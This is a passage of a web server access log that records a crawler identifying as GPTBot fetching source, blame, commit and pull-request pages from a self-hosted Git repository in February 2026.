AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 11904] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11570] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" -[17/Feb/2026:16:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9936] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9940] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:53:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10007] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10712] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=source" [Client 74.7.227.38] [Length 11314] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:16:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12013] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12013] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12011] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12011] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" -[17/Feb/2026:16:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11778] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:16:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11285] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11281] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:16:53:22 +0000] - 200 200 - GET https 